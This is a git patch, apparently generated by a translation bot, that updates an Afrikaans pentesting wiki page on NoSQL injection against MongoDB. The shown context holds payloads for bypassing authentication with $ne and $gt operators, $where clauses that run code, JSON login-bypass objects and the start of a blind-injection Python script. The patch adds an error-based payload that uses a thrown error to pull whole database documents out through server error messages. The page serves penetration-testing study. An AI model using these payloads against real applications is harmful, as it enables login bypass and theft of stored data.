From 936ce1b64a030230a54dc07ee70ffd96772e745c Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Tue, 8 Jul 2025 19:39:57 +0000
Subject: [PATCH] Translated ['src/pentesting-web/nosql-injection.md'] to af

---
 src/pentesting-web/nosql-injection.md | 13 ++++++++++---
 1 file changed, 10 insertions(+), 3 deletions(-)

diff --git a/src/pentesting-web/nosql-injection.md b/src/pentesting-web/nosql-injection.md
index fa5caa7e8..2862fccdc 100644
--- a/src/pentesting-web/nosql-injection.md
+++ b/src/pentesting-web/nosql-injection.md
@@ -17,9 +17,9 @@ username[$ne]=admin&pass[$gt]=s #<Greater Than>
 username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
 { $where: "this.credits == this.debits" }#<IF>, can be used to execute code
 ```
-### Basiese outentikasie omseiling
+### Basiese outentisering omseiling
 
-**Gebruik nie gelyk ($ne) of groter ($gt)**
+**Gebruik nie gelyk aan ($ne) of groter as ($gt)**
 ```bash
 #in URL
 username[$ne]=toto&password[$ne]=toto
@@ -108,6 +108,12 @@ Dit is moontlik om [**$lookup**](https://www.mongodb.com/docs/manual/reference/o
 }
 ]
 ```
+### Foutgebaseerde Inspuiting
+
+Inject `throw new Error(JSON.stringify(this))` in 'n `$where` klousule om volle dokumente via bediener-kant JavaScript-foute te eksfiltreer (vereis dat die toepassing databasisfoute lek). Voorbeeld:
+```json
+{ "$where": "this.username='bob' && this.password=='pwd'; throw new Error(JSON.stringify(this));" }
+```
 ## MongoDB Payloads
 
 Lys [van hier](https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt)
@@ -140,7 +146,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
 {"username": {"$gt":""}, "password": {"$gt":""}}
 {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
 ```
-## Blind NoSQL Skrip
+## Blind NoSQL Script
 ```python
 import requests, string
 
@@ -229,5 +235,6 @@ get_password(u)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection)
 - [https://nullsweep.com/a-nosql-injection-primer-with-mongo/](https://nullsweep.com/a-nosql-injection-primer-with-mongo/)
 - [https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb)
+- [https://sensepost.com/blog/2025/nosql-error-based-injection/](https://sensepost.com/blog/2025/nosql-error-based-injection/)
 
 {{#include ../banners/hacktricks-training.md}}